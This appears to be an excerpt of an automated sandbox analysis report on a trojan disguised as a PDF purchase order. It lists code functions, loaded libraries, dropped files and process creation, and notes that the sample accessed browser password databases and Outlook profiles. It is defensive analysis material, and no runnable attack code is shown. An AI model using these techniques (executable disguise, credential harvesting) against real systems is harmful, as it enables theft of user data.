            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3CC913_2_32B3CC91
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3B4EC3_2_32B3B4EC
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_32B3BD883_2_32B3BD88
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593BDF03_2_3593BDF0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35939D103_2_35939D10
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359396C83_2_359396C8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359386503_2_35938650
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593A9B03_2_3593A9B0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593A3603_2_3593A360
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593BA993_2_3593BA99
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35934DB23_2_35934DB2
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35934DB03_2_35934DB0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593BDE93_2_3593BDE9
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35939D003_2_35939D00
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35939D043_2_35939D04
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35939D0D3_2_35939D0D
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359325503_2_35932550
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359325603_2_35932560
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35931CB03_2_35931CB0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35931CA03_2_35931CA0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359374C43_2_359374C4
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359374C83_2_359374C8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35936C183_2_35936C18
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359314003_2_35931400
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359367B03_2_359367B0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359367BC3_2_359367BC
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35930FA83_2_35930FA8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359367C03_2_359367C0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593AFF83_2_3593AFF8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35935F103_2_35935F10
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35933F703_2_35933F70
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35933F603_2_35933F60
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359336B03_2_359336B0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359396B83_2_359396B8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359336C03_2_359336C0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359396C43_2_359396C4
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35932E103_2_35932E10
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593565F3_2_3593565F
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359386423_2_35938642
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359386473_2_35938647
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593864C3_2_3593864C
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359356603_2_35935660
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359329B83_2_359329B8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593A9A93_2_3593A9A9
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359329A83_2_359329A8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359351F83_2_359351F8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359321083_2_35932108
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593F1303_2_3593F130
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593F1293_2_3593F129
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359320F83_2_359320F8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593481C3_2_3593481C
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359300363_2_35930036
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359348203_2_35934820
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359318583_2_35931858
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359300403_2_35930040
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359370703_2_35937070
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359343B93_2_359343B9
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359343C83_2_359343C8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359313F03_2_359313F0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35933B183_2_35933B18
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35933B083_2_35933B08
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35937B523_2_35937B52
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593A3513_2_3593A351
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_3593A35C3_2_3593A35C
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35937B623_2_35937B62
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359363643_2_35936364
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359363683_2_35936368
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35935AB43_2_35935AB4
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35935AB83_2_35935AB8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359352073_2_35935207
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359352083_2_35935208
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359332583_2_35933258
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_359332683_2_35933268
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35E6E7C83_2_35E6E7C8
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35E6D6083_2_35E6D608
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_35E683283_2_35E68328
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: String function: 00402BBF appears 51 times
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3290961406.00000000025E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PURCHASE ORDER TRC-090971819130-24_pdf.exe
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312085003.00000000329B7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PURCHASE ORDER TRC-090971819130-24_pdf.exe
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@6/5
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 3_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004032A0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402095
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeMutant created: NULL
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsd50D3.tmpJump to behavior
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3313828525.0000000033B9D000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032C88000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032C73000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032C65000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032C94000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-090971819130-24_pdf.exe, 00000003.00000002.3312322172.0000000032C55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exeReversingLabs: Detection: 55%
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeFile read: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: PURCHASE ORDER TRC-090971819130-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2205388503.0000000002BCC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
